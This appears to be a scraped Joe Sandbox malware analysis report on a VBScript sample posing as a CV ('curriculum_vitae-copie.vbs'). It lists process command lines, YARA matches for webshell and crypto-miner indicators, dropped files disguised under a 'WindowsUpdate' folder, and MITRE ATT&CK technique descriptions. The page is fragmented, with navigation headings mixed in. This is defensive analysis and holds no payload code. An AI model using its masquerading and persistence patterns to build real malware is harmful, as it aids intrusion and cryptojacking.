Yara matches:	Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000017.00000003.880754735.000001E320A92000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp

Analysis Process: wscript.exePID: 6712, Parent PID: 3452

General

Target ID:	24
Start time:	17:29:08
Start date:	06/06/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Imagebase:	0x7ff7c3fc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000018.00000002.898732843.000001DBC7705000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

Analysis Process: wscript.exePID: 6860, Parent PID: 6712

General

Target ID:	25
Start time:	17:29:09
Start date:	06/06/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Imagebase:	0x7ff7c3fc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000019.00000003.898659213.000001FFE094A000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report curriculum_vitae-copie.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\7g.exe

C:\Users\Public\WindowsUpdate\Update.xml

C:\Users\Public\WindowsUpdate\WinRing0x64.sys

C:\Users\Public\WindowsUpdate\go.exe

C:\Users\Public\WindowsUpdate\mozilla.vbs

C:\Users\Public\WindowsUpdate\mservice.exe

C:\Users\Public\WindowsUpdate\mservice.vbs

C:\Users\Public\WindowsUpdate\ps.exe

C:\Users\Public\WindowsUpdate\sarmat.vbs

C:\Users\Public\gmail.7z

C:\Users\Public\log.dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\7zr[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\gmail[1].7z

Windows Analysis Report
curriculum_vitae-copie.vbs

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre